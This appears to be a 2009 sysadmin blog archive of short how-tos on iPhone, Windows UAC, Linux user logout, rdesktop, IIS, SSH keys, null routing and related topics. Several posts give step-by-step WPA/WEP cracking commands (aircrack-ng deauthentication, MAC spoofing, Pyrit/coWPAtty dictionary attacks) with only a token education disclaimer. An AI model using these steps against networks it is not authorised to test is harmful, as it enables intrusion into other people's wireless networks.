Monday, November 30, 2009

Add mobile websites to your iPhone's home screen

Many websites and services offer great mobile versions without being packaged in an App Store application. If you want to be able to quickly access these sites from your home screen, follow these steps:
  1. Launch Safari on your iPhone
  2. Browse to a desired mobile site (most sites will automatically redirect you to the mobile version once they determine that you're using an iPhone)
  3. Click the Favorites (+) button at the bottom of Safari
  4. Click "Add to Home Screen"
  5. Type a name for the icon that will appear on your home screen
  6. Click the "Add" button
You will now see an icon on your home screen that will take you directly to the mobile website.

How to Wipe Your iPhone of all Personal Data

Clearing all of the data from your iPhone is simple.
  1. Go to Settings
  2. Tap on General
  3. Scroll all the way down and tap Reset
  4. Choose Erase All Content and Settings
  5. Enter passcode (if you're using one)
  6. Select Erase iPhone (twice), confirming that you REALLY want to lose everything
Make sure you have it plugged in, as the process will take quite a long time, "about an hour" according to the warning. But, believe me, it is time well spent!

Once the process is complete, you'll be left with a "factory fresh" installation of the iPhone OS with no trace of you or your data.

Sunday, November 29, 2009

Disable User Account Control (UAC) on Windows 7 or Vista via Control Panel

This is an easy method that you can use to disable the annoying User Account Control (UAC) from the control panel GUI interface in either Windows 7 or Vista.

See enable or disable UAC from the command line to do it from the trusty command line.

Note: Disabling UAC will lead to a less secure system, so be warned.

Disable UAC on Windows Vista
Open Control Panel, and type “UAC” into the search box. You’ll see a link for “Turn User Account Control (UAC) on or off”:

On the next screen you should uncheck the box for “Use User Account Control (UAC)”, and then click on the OK button.

Unfortunately you will have to reboot your computer before the changes take effect, but you will be all done with annoying prompts.

Disable UAC on Windows 7
Windows 7 makes it much easier to deal with UAC settings, and in fact you don’t have to completely disable UAC if you don’t want to. Just type UAC into Start/Run, Start/Search or Control Panel search boxes.

You can simply drag the slider up or down, depending on how often you want to be alerted.

If you drag it all the way down to the bottom, you’ll have disabled it entirely.

How to kill and logout a user in Linux

You can check who is logged in to a Linux system by executing the who or w commands:
who
w
Then find the PID(s) of the user's processes, filtering on the username (or on the tty shown by who):
ps aux | grep username
and kill them:
kill -KILL PID
Or use the pkill command to kill every process belonging to that username:
pkill -KILL -u username
It would be nice to send the users a warning message before logging them out.
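The warning step the post wishes for, as an added example that is not part of the original post: it parses `who` output for the user's sessions, writes a notice to each tty, waits, then sends SIGTERM before the page's `pkill -KILL -u`. The `who` sample and the `dry_run` stand-in for subprocess.run are constructed so the command sequence can be inspected without root.

```python
"""Graceful forced logout: warn the user's sessions first, then terminate them."""
import subprocess
import time

WARNING = "Admin notice: this session will be closed in {n} seconds. Save your work now.\n"


def sessions_for_user(who_output: str, user: str) -> list:
    """Return the ttys on which `user` is logged in, parsed from `who` output."""
    ttys = []
    for line in who_output.splitlines():
        parts = line.split()          # user, tty, date, time, [origin]
        if len(parts) >= 2 and parts[0] == user:
            ttys.append(parts[1])
    return ttys


def logout_user(user: str, grace_seconds: int = 60,
                run=subprocess.run, sleep=time.sleep) -> list:
    """Warn every session of `user`, wait, then SIGTERM and finally SIGKILL.

    Returns the argv of every command issued after `who` so the action can be
    audited. Signalling another user's processes needs root.
    """
    issued = []

    def do(argv, **kwargs):
        issued.append(argv)
        return run(argv, **kwargs)

    who = run(["who"], capture_output=True, text=True, check=True).stdout
    ttys = sessions_for_user(who, user)
    if not ttys:
        return issued  # nothing to do: no interactive session for that user

    # 1. `write user tty` delivers the warning to each of the user's terminals.
    for tty in ttys:
        do(["write", user, tty], input=WARNING.format(n=grace_seconds),
           text=True, check=False)
    sleep(grace_seconds)
    # 2. Polite termination first, so shells and editors can clean up...
    do(["pkill", "-TERM", "-u", user], check=False)
    sleep(5)
    # 3. ...then SIGKILL for anything still running (the post's pkill -KILL -u).
    do(["pkill", "-KILL", "-u", user], check=False)
    return issued


# Constructed `who` output: two sessions for alice, one for bob.
SAMPLE_WHO = (
    "alice    pts/0        2009-11-29 10:01 (192.0.2.10)\n"
    "bob      tty1         2009-11-29 09:40\n"
    "alice    pts/2        2009-11-29 10:15 (192.0.2.10)\n"
)


def dry_run(user: str, grace_seconds: int = 30) -> list:
    """Run logout_user against SAMPLE_WHO without executing commands or sleeping."""
    def fake_run(argv, **kwargs):
        out = SAMPLE_WHO if argv == ["who"] else ""
        return subprocess.CompletedProcess(argv, 0, stdout=out)
    return logout_user(user, grace_seconds, run=fake_run, sleep=lambda _s: None)


if __name__ == "__main__":
    for argv in dry_run("alice"):
        print(" ".join(argv))
```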

Using Remote Desktop for Linux with rdesktop

The rdesktop client can be used from Linux machines to connect to Windows Terminal Services over the Remote Desktop Protocol (RDP). It supports all versions of Microsoft Windows, including the latest Windows Server 2008 and Windows 7 operating systems, and it runs on most Unix-based platforms as well as other ports.

Visit http://sourceforge.net/projects/rdesktop/ for more information or to download rdesktop.

Download and Install:
  1. wget http://garr.dl.sourceforge.net/sourceforge/rdesktop/rdesktop-1.6.0.tar.gz
  2. tar -zxf rdesktop-1.6.0.tar.gz
  3. cd rdesktop-1.6.0
  4. ./configure
  5. make
  6. make install
Basic Usage:
rdesktop -k en-us -a 16 -f -u <username> -p <password> <server>
Command Options Used:
-f switch for full screen mode
-k for keyboard layout on server
-a for color depth
-u for username
-p for password
Note: To exit full screen mode press: CTRL + ALT + Enter

Full Usage Options
Usage: rdesktop [options] server[:port]
-u: user name
-d: domain
-s: shell
-c: working directory
-p: password (- to prompt)
-n: client hostname
-k: keyboard layout on server (en-us, de, sv, etc.)
-g: desktop geometry (WxH)
-f: full-screen mode
-b: force bitmap updates
-L: local codepage
-A: enable SeamlessRDP mode
-B: use BackingStore of X-server (if available)
-e: disable encryption (French TS)
-E: disable encryption from client to server
-m: do not send motion events
-C: use private colour map
-D: hide window manager decorations
-K: keep window manager key bindings
-S: caption button size (single application mode)
-T: window title
-N: enable numlock syncronization
-X: embed into another window with a given id.
-a: connection colour depth
-z: enable rdp compression
-x: RDP5 experience (m[odem 28.8], b[roadband], l[an] or hex nr.)
-P: use persistent bitmap caching
-0: attach to console
-4: use RDP version 4
-5: use RDP version 5 (default)
There is also a graphical user interface (GUI) that you can use named Terminal Server Client [tsclient]
Visit: http://sourceforge.net/projects/tsclient for more information and to download tsclient.

Disable/Enable User Account Control (UAC) on Windows 7 or Vista from the Command Line

Microsoft introduced User Account Control (UAC) in Windows Vista. UAC enables users to perform common tasks as non-administrators, called standard users in Windows (Vista and Windows 7), and as administrators without having to switch users, log off, or use Run As. A standard user account is synonymous with a user account in Windows XP. User accounts that are members of the local Administrators group will run most applications as a standard user. By separating user and administrator functions while enabling productivity, UAC is an important enhancement for Windows.

Disable UAC from the command line
%systemroot%\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
Enable UAC from the command line
%systemroot%\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 1 /f
A couple of caveats
  1. Must be run with administrative rights. You can right-click the Command Prompt shortcut and select Run as Administrator.
  2. You may have to reboot for the change to take effect.
You can also enable or disable UAC from the Control Panel.

How to remotely shutdown, restart or logoff a Windows Machine

With these simple commands you can remotely restart, shut down, log off or even abort a system shutdown on local or remote Windows machines using the Remote Shutdown Tool (shutdown.exe).

The Remote Shutdown Tool can be accessed via a GUI or from the command prompt.

The Remote Shutdown Tool GUI can be accessed by executing:
shutdown.exe /i

Usage examples
Restart a network machine and force any running applications to close
shutdown /m \\computername /r /f

Abort a previous shutdown command
shutdown /m \\computername /a
Shutdown a network machine and force any running applications to close
shutdown /m \\computername /s /f
Log off the local machine and force any running applications to close (this cannot be used with /m to specify a target machine)
shutdown /l /f
Hibernate the local machine and force any running applications to close (like /l, /h applies only to the local machine)
shutdown /h /f
Note: By default the time-out period in the previous examples is 30 seconds.
Restart a network machine and force any running applications to close, giving a reason and setting the time-out period to 1 minute (120 sec).
shutdown /m \\computername /r /f /c "Computers will restart in 1 minute, please save any work. System Administrator" /t 120
Schedule a restart of a machine:
at 23:00 /every:M,T,W,Th,F shutdown /r /m \\computername
Note: this will run on all versions of Windows (2000, 2003, 2008, XP, Vista, Windows 7).

IIS 7 Log Files Default Location

In Internet Information Services 7 Microsoft changed the default log files location.

IIS 7 Log files location
%SystemDrive%\inetpub\logs\LogFiles
IIS 6 Log files location
%windir%\System32\LogFiles

How to Add Quick Launch to Windows 7 Task Bar

By default Windows 7 does not display quick launch on the taskbar like Windows XP and Vista.

How to Enable Quick Launch in Windows 7
  1. Right-click on taskbar.
  2. From Toolbars Menu select New Toolbar.
  3. Under Folder add: %appdata%\Microsoft\Internet Explorer\Quick Launch then press Select Folder.
How to Unlock the Taskbar
  1. Unlock the taskbar by right-clicking on taskbar and select unlock the taskbar.
  2. To lock, do the same but select lock the taskbar.
Taskbar options
In Windows 7 Quick Launch you can choose whether to display the title and whether to show text. To change these settings, unlock the taskbar, right-click in the Quick Launch area of the taskbar and toggle Show Text and Show Title as desired.

BackTrack 4 PreRelease Hard Disk Install

Since BackTrack 4 Pre-Release does not contain an installer, you can follow these steps to install BT4 quickly and easily. The assumption is that you are installing BT4 on an empty disk (/dev/sda in this tutorial).

Boot the BT4 DVD (download the BackTrack 4 ISO - make sure to get the BT 4 Beta and not the BT4 Pre Release). The commands to enter are shown after the root@bt prompt; everything else is program output.

1. Start by creating 3 partitions on the disk, one each for boot, swap and root. Note: since your disk size is probably different from mine, the number of cylinders will likely be different.
root@bt:~# fdisk /dev/sda

The number of cylinders for this disk is set to 19457.
There is nothing wrong with that, but this is larger than 1024,
and could in certain setups cause problems with:
1) software that runs at boot time (e.g., old versions of LILO)
2) booting and partitioning software from other OSs
(e.g., DOS FDISK, OS/2 FDISK)

Command (m for help): n
Command action
e extended
p primary partition (1-4)
p
Partition number (1-4): 1
First cylinder (1-19457, default 1): <enter>
Using default value 1
Last cylinder, +cylinders or +size{K,M,G} (1-19457, default 19457): +128M

Command (m for help): n
Command action
e extended
p primary partition (1-4)
p
Partition number (1-4): 2
First cylinder (18-19457, default 18): <enter>
Using default value 18
Last cylinder, +cylinders or +size{K,M,G} (18-19457, default 19457): +1024M

Command (m for help): n
Command action
e extended
p primary partition (1-4)
p
Partition number (1-4): 3
First cylinder (150-19457, default 150): <enter>
Using default value 150
Last cylinder, +cylinders or +size{K,M,G} (150-19457, default 19457): +16000M

Command (m for help): t
Partition number (1-4): 2
Hex code (type L to list codes): 82
Changed system type of partition 2 to 82 (Linux swap / Solaris)

Command (m for help): a
Partition number (1-4): 1

Command (m for help): w
The partition table has been altered!

Calling ioctl() to re-read partition table.
Syncing disks.
root@bt:~#
2. Format the file systems, mount them and copy over the directory structure. Chroot into new environment.
root@bt:~# mke2fs /dev/sda1
root@bt:~# mkswap /dev/sda2
root@bt:~# swapon /dev/sda2
root@bt:~# mkreiserfs /dev/sda3
root@bt:~# mkdir /mnt/bt
root@bt:~# mount /dev/sda3 /mnt/bt/
root@bt:~# mkdir /mnt/bt/boot
root@bt:~# mount /dev/sda1 /mnt/bt/boot
root@bt:~# cp --preserve -R /{bin,dev,home,pentest,root,usr,boot,etc,lib,opt,sbin,var} /mnt/bt/
root@bt:~# mkdir /mnt/bt/{mnt,tmp,proc,sys}
root@bt:~# chmod 1777 /mnt/bt/tmp/
root@bt:~# mount -t proc proc /mnt/bt/proc
root@bt:~# mount -o bind /dev /mnt/bt/dev/
root@bt:~# chroot /mnt/bt/ /bin/bash
3. Configure /etc/lilo.conf to reflect your setup.
lba32
boot=/dev/sda
root=/dev/sda3

# bitmap=/boot/sarge.bmp
# bmp-colors=1,,0,2,,0
# bmp-table=120p,173p,1,15,17
# bmp-timer=254p,432p,1,0,0
# install=bmp

# delay=20

prompt
timeout=50

# map=/boot/map

vga=0x317

image=/boot/vmlinuz
label="BT4"
read-only
initrd=/boot/splash.initrd
append=quiet
4. Fix first line in /etc/fstab, and remove unnecessary mount lines. Add the swap partition to the fstab so it gets loaded at boot time. Your fstab should look similar to this:
/dev/sda3 / reiserfs defaults 0 0 # AutoUpdate
/dev/sda2 none swap sw 0 0
proc /proc proc defaults 0 0 # AutoUpdate
sysfs /sys sysfs defaults 0 0 # AutoUpdate
devpts /dev/pts devpts gid=5,mode=620 0 0 # AutoUpdate
tmpfs /dev/shm tmpfs defaults 0 0 # AutoUpdate
5. Execute lilo and reboot!
root@bt:/# lilo -v
LILO version 22.8, Copyright (C) 1992-1998 Werner Almesberger
Development beyond version 21 Copyright (C) 1999-2006 John Coffman
Released 19-Feb-2007, and compiled at 14:08:06 on May 15 2008
Ubuntu

Reading boot sector from /dev/sda
Using MENU secondary loader
Calling map_insert_data

Boot image: /boot/vmlinuz
Mapping RAM disk /boot/splash.initrd
Added BT4 *

Writing boot sector.
Backup copy of boot sector in /boot/boot.0800
root@bt:/# exit
exit
root@bt:~# reboot
HowTo: Crack WPA with Backtrack 3
This is an easy to follow tutorial on how to crack a WPA encrypted password. This information should only be used for education purposes.

Steps:
  1. airmon-ng stop wlan0
  2. ifconfig wlan0 down
  3. macchanger --mac 00:11:22:33:44:55 wlan0
  4. airmon-ng start wlan0
  5. airodump-ng wlan0
  6. airodump-ng -c (channel) -w (file name) --bssid (bssid) wlan0
  7. aireplay-ng -0 5 -a (bssid) wlan0
  8. aircrack-ng (filename-01.cap) -w (dictionary location)

HowTo: Crack WEP with BackTrack 3
This is a tutorial on how to crack a wep encrypted password. This information should only be used for education purposes.

Steps:
  1. airmon-ng stop wlan0
  2. ifconfig wlan0 down
  3. macchanger --mac 00:11:22:33:44:55 wlan0
  4. airmon-ng start wlan0
  5. airodump-ng wlan0
  6. airodump-ng -c (channel) -w (file name) --bssid (bssid) wlan0
  7. aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 wlan0
  8. aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 wlan0
  9. aircrack-ng -b (bssid) (filename-01.cap)

How to Install and Configure IIS 7 FTP Publishing Service

The new FTP Publishing Service 7.5 has been rewritten for Windows Server 2008, with many new features and additions included (integration with IIS 7, FTP over SSL (since v7.0), improved logging, etc.).

Prerequisites
1. Internet Information Services 7.0 installed.
2. Windows Server 2008 or Vista.
3. Download FTP Publishing Service 7.5
4. Create a folder for FTP Publishing Service and allow Full access for Administrators
  • mkdir "c:\inetpub\ftproot\ftp.mydomain.com"
  • cacls "c:\inetpub\ftproot\ftp.mydomain.com" /G administrators:F /T /E
In case we want to grant access to a specific backup user we can use the following command:
  • cacls "c:\inetpub\ftproot\ftp.mydomain.com" /G username:F /T /E
Permissions:
R  Read
W  Write
C  Change (write)
F  Full control
Installation
Before installing FTP Publishing Service 7.5 over IIS 7.0 be sure that you uninstall any previous versions of FTP Publishing Service.

  1. When the installation program of Microsoft FTP Service for IIS 7.0 begins, click Next.
  2. Accept the End-User License Agreement and click Next.
  3. Select the features you want to be installed and click Next.
  4. Click Install to begin the installation.
  5. At the end click Finish.

Creating the Certificate
After the installation finishes we open Internet Information Services 7.0 Manager and select Server Certificates to create a self-signed SSL certificate. Another option is to create a certificate request to process with a third-party SSL provider, which is recommended for production systems because such certificates chain to a trusted root.

Server Certificates

Click on Create Self-Signed Certificate…

Create a self-signed certificate

Specify a certificate name and click OK:

Specify certificate name


Creating the FTP Site
Right click the Sites node in the tree and click Add FTP Site…

Add FTP Site...

On the Add FTP Site wizard add the FTP site name and select the path we created in the prerequisites and click Next.

Add FTP Site Wizard

On the next page of the wizard we click the Require SSL option and we choose our SSL Certificate then we click Next.

Binding and SSL Settings

On the next page of the wizard we select Basic for Authentication and on Allow access to we select specified users and we define our backup ftp account with read and write permissions then we click on Finish. In case we want to allow anonymous ftp connections select Anonymous authentication and on Permissions we select the Read.

Authentication and Authorization Information


Configure the Firewall
If we are behind a firewall we should configure FTP Firewall Support under Internet Information Services Manager and configure our firewall to accept passive connections on the ports we specify. In case we want to use the dynamic port range, under Data Channel Port Range we enter the port range "0-0".

FTP Firewall Support


Configure the FTP Client (FileZilla for example)
Configure FTP Client to connect to our FTP Site using FTP over explicit TLS/SSL.

FTP Client Settings


Troubleshooting
In case you get “534 Local policy on server does not allow TLS secure connections.” error this is because we need to select an SSL certificate at the Server Level.

FTP SSL Settings Server Level
FTP SSL Settings Certificate Selection

Saturday, November 28, 2009

Wireless WPA/WPA2-PSK GPU Cracking with Pyrit - How to Use Pyrit in BackTrack

Pyrit is a GPU cracker for attacking the WPA/WPA2-PSK protocols. It allows you to create massive databases, pre-computing part of the WPA/WPA2-PSK authentication phase in a space-time tradeoff. Pyrit works with many platforms including CUDA, ATI-Stream, OpenCL and VIA Padlock.

How to
Listing available cores
pyrit list_cores


Determining performance of cores
pyrit benchmark


Create a new ESSID
pyrit -e Linksys create_essid
Import list of passwords
pyrit -f dict.txt import_passwords

Start Batch Processing
pyrit batch


Cracking WPA/WPA2-PSK using pyrit/coWPAtty
pyrit -e "Linksys" -f dict.txt passthrough | cowpatty -d - -r wpa2handshake.cap -s "Linksys"
"-e" ESSID for the command
"-f" Filename for the command ('-' is stdin/stdout)
"-d" Hash file
"-" Accept words on stdin
"-r" Packet capture file
"-s" Network SSID

Thursday, November 26, 2009

Root Access Email Alert


Get notified when a user logs in with root privileges.

1) Edit .bashrc under /root to get notified by email when someone logs in as root
2) Add the following:
# who -m reports only the session that opened this shell, so the subject carries the origin of this login
echo "ALERT - Root Shell Access (Server Name) on: $(date) $(who -m)" | mail -s "Alert: Root Access from $(who -m | cut -d'(' -f2 | cut -d')' -f1)" youremail@domain.com

TrueCrypt - Free Open Source Industrial Strength Encryption

TrueCrypt provides a solution for encrypting sensitive data - everything from portable, mountable volumes to entire hard disks. Encrypting your data renders it useless to anyone without the pass phrase, even if your computer or your thumbdrive falls into the wrong hands.

And TrueCrypt makes it not only easy, but nearly un-crackable. TrueCrypt is both open source and FREE.

There are two approaches to using TrueCrypt:
  • Whole Drive Encryption - you can use TrueCrypt to encrypt your entire hard disk, including your boot partition. In order to boot the machine, you must first supply your pass phrase to enable decryption. Once booted, data is automatically and transparently encrypted and decrypted as it travels to and from the disk. Once your machine is turned off, the data is unrecoverable without knowing the pass phrase.
  • Container Encryption - with this approach you create a single file on your computer's hard drive that is encrypted. You then "mount" that file using TrueCrypt, supplying the correct pass phrase to decrypt it after which the contents of that file appear as another drive on your system. Reading from and writing to that "drive" automatically and transparently decrypts and encrypts the data. Once the drive is unmounted, the data is once again unrecoverable without knowing the pass phrase.

TrueCrypt is both simple and elegant.

Most users prefer container based encryption for its portability, and for the fact that you need only mount the encrypted drive when you need access. You could keep personal information in a TrueCrypt container that could be regularly copied between machines, onto a thumbdrive, and even backed up to the Internet. When you need to access the encrypted data, simply mount it, specify your pass phrase to unlock it, and use the files that are stored within it.

TrueCrypt is not tied to any one platform, your user account or anything else; just the pass phrase. In fact, you can copy your encrypted file to another machine entirely and mount it with TrueCrypt, even under other operating systems such as Mac or Linux.

Here are a couple of important caveats:
  • Encryption does not make a bad pass phrase any more secure. If you choose an obvious pass phrase, an attack can certainly be mounted that could unlock your encrypted volume. This is why we talk about pass phrase instead of password. Use a multi-word phrase that you can remember to be the key to your encrypted data, and it'll be much, much more difficult to break.
  • An encrypted volume does you no good if the files you care about are also elsewhere on your machine.
  • Make sure you have secure backups, updated regularly. Preferably keep them UNencrypted, but secure in some other way, in case you lose your encrypted volume or forget your pass phrase. If you've chosen a good passphrase, without it the data is not recoverable.

TrueCrypt is FREE open-source disk encryption software for Windows 7/Vista/XP, Mac OS X, and Linux

Data encryption is an important part of an overall security strategy. TrueCrypt can be a key part of that strategy.

Download TrueCrypt.

How to create and use Public Keys with SSH

SSH and SFTP Public Key Authentication requires that you create a public/private key pair. In this howto we will look at how to create then use those keys.

SSH (Secure Shell) and SFTP (Secure FTP) support a very strong security model that can be used instead of the normal username and password authentication scheme. It uses public key cryptography to create a different, and more secure approach to authenticating your identity and rights to access a server or resource.

Essentially you will generate a public and private key pair. The public key will be placed on the server by your system administrator, giving you access. You will keep the file containing the private key in a safe place. You'll log in simply by providing that private key file to your SSH or SFTP client.

The private key is just that - private. You may put a password on it, but you don't have to. Without a password, all you need is the file in order to login. Or, to put it more clearly, all anyone needs is that file to login as you. Obviously if you password protect the file, then you'll need both the file, and the password to unlock it. In that case, logging in is very similar to what you do today: specify a user name, and a password to unlock your key file.

Instructions are included here for the following tools, which are known to work with this technique:

SSH Clients:
  • PuTTY
  • SecureCRT
SFTP Clients:
  • PSFTP
  • Webdrive
  • WS_FTP

Instructions for these tools are not provided here, but they either claim or have been confirmed to have the appropriate support:
SSH Clients:
  • Tera Term Pro
SFTP Clients:
  • CuteFTP Professional
  • WinSCP
Other tools may also work. The key terminology to look for is "SSH" or "SFTP" and "Public Key Authentication".

Generating Your Keys

In general it's best to create your own key. That way you control what happens to your private key.

PuTTYgen

PuTTY is a free SSH client that includes a tool for generating keys, called PuTTYgen. PuTTY is my preferred SSH client.

Run PuTTYgen and click the "Generate" button.

Follow the prompt to move the mouse around to generate randomness, which is a key component of public key cryptography. Once that's done, you should do the following:
  • Specify a passphrase. Technically this is optional, but if you omit the passphrase, then anyone who happens to get ahold of your private key file can login as you. You may have enough security in place where this is not an issue. If you do specify a passphrase, you'll need to enter it when you login, pretty much as a normal login.
  • Press the Save Public Key button to save the public key. I recommend saving as your name ".pub". For example I would save "powercram.pub".
  • Press the Save Private Key button to save your private key. This saves the private key in PuTTY's own format, a ".ppk" file. So, "name.ppk" might be appropriate.
  • I also recommend hitting the Conversions menu, and then Export Openssh key, and saving that to "name.key". This format will allow you to use your private key with other applications besides PuTTY.

SecureCRT

SecureCRT is a stand-alone SSH client.
To create a public key with SecureCRT, click the Tools menu, then the Create Public Key... option to begin the wizard. Select RSA as the key type. Enter an appropriate passphrase to protect your private key (or leave it empty). A default key length of 1024 is sufficient. Allow SecureCRT to save the key, noting the location. It may ask if you want to use this as your global Public Key, and you can safely say "yes".

WS_FTP

In WS_FTP, click Tools, Options, and then click on SSH, Client Keys:

Press Create, and step through the wizard. The key type should be RSA, and the default size of 1024 is sufficient. Once the key has been created and shows up in the list, click on it, and then click on Export to export your public key.

Using Your Keys - SSH

Once your keys are generated, and the public key installed on the server, you'll need to specify the private key to your SSH client in order to log in.

PuTTY

There are at least two approaches to using Public/Private keys with PuTTY. When you launch PuTTY without any arguments, you get its standard configuration dialog, into which you can enter the name of the server you want to connect to:

On the left hand side is a tree view of various options. Underneath Connection, SSH, click on Auth and the dialog will include a field "Private key file for authentication":

Specify the location of the ".ppk" file that you generated with PuTTYgen. When you connect, if your private key is passphrase protected, you'll be asked for the passphrase. The other approach is to simply create shortcuts for the various servers I connect to regularly, and specify the location of the private key on the command line. For example:
C:\path\PUTTY.EXE -i c:\admin\powercram.ppk admin@server.com
That, as a desktop shortcut, or item on a Windows menu, connects to the named server using the specified account name "admin", and uses the private key found in "c:\admin\powercram.ppk" to authenticate.

SecureCRT

SecureCRT has several paths to a connection dialog, but we'll use "Quick Connect" for our example. Click the Quick Connect Icon:

Make sure that protocol is set to SSH2, and enter your host and username. In Authentication, UNcheck everything except PublicKey. Then click on that, and click Properties.

Typically you don't need to do anything here, but this dialog specifies the location of your identity file (aka private key). Assuming that your public key has been placed on the server for your account, you should now be able to connect.

Using Your Keys - SFTP

Secure FTP, or SFTP, is really just using SSH technology to provide FTP-like functionality. Since it's using SSH, the keys you've generated and are using for your SSH authentication work with many SFTP applications as well.

WebDrive

Webdrive is an FTP/SFTP service for Windows that allows you to treat an FTP or SFTP connection like another drive mounted on your system. Uploading and downloading then become simple Windows file copy operations. In Webdrive, you'll need to load your private key, and then specify it in the configuration for a specific SFTP connection. The Certificates tab of Webdrive's Settings dialog has a Hostkey Management button. Push that, and you'll get the host key management dialog, on which you'll find an Import button. Press that to import your public and private keys:

Specify the ".pub" key for the public key you generated earlier. The private key should also be specified, and would be the ".key" file. If you passphrase protected your key file, you can specify that here as well. Give it a recognizable name.  The second step, then, takes us back to the Webdrive main window.

Click on a connection (or create a new one). In the Properties for that connection, on the SFTP tab will be a setting Enable client hostkey support for this site:

Here you'll find a dropdown list of the keys you imported above, and a place to enter the password, if any, to access that key.  Once completed, Webdrive should now be able to connect to your public key authenticated site.

WS_FTP

Having created a key pair already in WS_FTP, using it is simply a matter of defining your connection to use it.
When you create a site, specify its connection type as SFTP/SSH. Specify a user name, but leave your password blank. At the end of the wizard, click on the Advanced button; this allows you to edit the connection, and is equivalent to editing an existing connection.

Click on the SSH item on the left, and the dropdown list that results should allow you to select the key pair that you created earlier.  Assuming that the public key you exported and sent to your system administrator has been installed on the server, you should now be able to connect.

psftp

PSFTP is a command-line SFTP program that is distributed with PuTTY. More importantly, it supports public key SFTP by using the ".ppk" file that you created for PuTTY above. Connecting using a public key is simply a different set of command line options:
psftp -l username -2 -i keys.ppk remotehost
-l username specifies your username on the remote host; -2 indicates that PSFTP should use SSH protocol version 2; -i keys.ppk specifies the location of your private key as created with PuTTYgen; remotehost is the name of the remote host you're connecting to.

Tuesday, November 24, 2009

How do I Drop or block attackers IP with null routes?

Someone might attack your system. You can drop an attacker's IP using iptables, but you can also use the route command to null-route unwanted traffic. A null route (also called a blackhole route) is a network route or kernel routing table entry that goes nowhere. Matching packets are dropped (ignored) rather than forwarded, acting as a kind of very limited firewall. The act of using null routes is often called blackhole filtering.

A null route (as ISPs sometimes use) prevents your network device from sending any data to a remote system, stopping various attacks coming from a single IP (read: spammers or hackers):

Nullroute IP using route command

Suppose that bad IP is 65.21.34.4, type following command at shell:

# route add 65.21.34.4 gw 127.0.0.1 lo

You can verify it with following command:
# netstat -nr

OR
# route -n

You can also use reject target (thanks to Gabriele):
# route add -host IP-ADDRESS reject
# route add -host 64.1.2.3 reject


To confirm the null routing status, use ip command as follows:
# ip route get 64.1.2.3

Output:
RTNETLINK answers: Network is unreachable

Drop entire subnet 192.67.16.0/24:
# route add -net 192.67.16.0/24 gw 127.0.0.1 lo

You can also use ip command to null route network or ip, enter:
# ip route add blackhole 202.54.5.2/29
# route -n

How do I remove null routing? How do I remove blocked IP address?

Simply use the route delete command:
# route delete 65.21.34.4

Friday, November 20, 2009

"The Dude" Network Monitor for Windows

The Dude network monitor is an application by MikroTik which can dramatically improve the way you manage your network environment. It will automatically scan all devices within specified subnets, draw and layout a map of your networks, monitor services of your devices and alert you in case some service has problems.
  • The Dude is free of charge!
  • Auto network discovery and layout
  • Discovers any type or brand of device
  • Device, Link monitoring, and notifications
  • Includes SVG icons for devices, and supports custom icons and backgrounds
  • Easy installation and usage
  • Allows you to draw your own maps and add custom devices
  • Supports SNMP, ICMP, DNS and TCP monitoring for devices that support it
  • Individual Link usage monitoring and graphs
  • Direct access to remote control tools for device management
  • Supports remote Dude server and local client
  • Runs in Linux Wine environment, MacOS Darwine, and Windows
  • Best price/value ratio compared to other products (free of charge)

Thursday, November 19, 2009

Microsoft IIS W3C Extended Log Format

This log file format is used by Microsoft Internet Information Server (IIS) 4.0, 5.0, 6.0 and 7.0.

A log file in the extended format contains a sequence of lines containing ASCII characters. Each line may contain either a directive or an entry. Entries consist of a sequence of fields relating to a single HTTP transaction. Fields are separated by white space. If a field is unused in a particular entry, a dash ("-") marks the omitted field. Directives record information about the logging process itself.

Lines beginning with the # character contain directives. The following directives are defined:

Version: <integer>.<integer>
The version of the extended log file format used. This draft defines version 1.0.
Fields: [<specifier>...]
Lists a sequence of field identifiers specifying the information recorded in each entry.
Software: string
Identifies the software which generated the log.
Start-Date: <date> <time>
The date and time at which the log was started.
End-Date: <date> <time>
The date and time at which the log was finished.
Date: <date> <time>
The date and time at which the entry was added.
Remark: <text>
Comment information. Data recorded in this field should be ignored by analysis tools.

The directives Version and Fields are required and should precede all entries in the log. The Fields directive specifies the data recorded in the fields of each entry.

W3C Extended Logging Field Definitions

Prefix   Meaning
s-       Server actions.
c-       Client actions.
cs-      Client-to-server actions.
sc-      Server-to-client actions.

Field               Appears As        Description
Date                date              The date that the activity occurred.
Time                time              The time that the activity occurred.
Client IP Address   c-ip              The IP address of the client that accessed your server.
User Name           cs-username       The name of the authenticated user who accessed your server. This does not include anonymous users, who are represented by a hyphen (-).
Service Name        s-sitename        The Internet service and instance number that was accessed by a client.
Server Name         s-computername    The name of the server on which the log entry was generated.
Server IP Address   s-ip              The IP address of the server on which the log entry was generated.
Server Port         s-port            The port number the client is connected to.
Method              cs-method         The action the client was trying to perform (for example, a GET method).
URI Stem            cs-uri-stem       The resource accessed; for example, Default.htm.
URI Query           cs-uri-query      The query, if any, the client was trying to perform.
Protocol Status     sc-status         The status of the action, in HTTP or FTP terms.
Win32® Status       sc-win32-status   The status of the action, in terms used by Microsoft Windows®.
Bytes Sent          sc-bytes          The number of bytes sent by the server.
Bytes Received      cs-bytes          The number of bytes received by the server.
Time Taken          time-taken        The duration of time, in milliseconds, that the action consumed.
Protocol Version    cs-version        The protocol (HTTP, FTP) version used by the client. For HTTP this will be either HTTP 1.0 or HTTP 1.1.
Host                cs-host           The content of the Host header.
User Agent          cs(User-Agent)    The browser used on the client.
Cookie              cs(Cookie)        The content of the cookie sent or received, if any.
Referrer            cs(Referer)       The previous site visited by the user. This site provided a link to the current site.

The following is an example of a record in the extended log format that was produced by the Microsoft Internet Information Server (IIS):
--------------------------------------------------------------------------------

#Software: Microsoft Internet Information Services 6.0
#Version: 1.0
#Date: 2009-11-19 19:42:21
#Fields: date time s-sitename s-computername s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs-version cs(User-Agent) cs(Cookie) cs(Referer) cs-host sc-status sc-substatus sc-win32-status sc-bytes cs-bytes time-taken
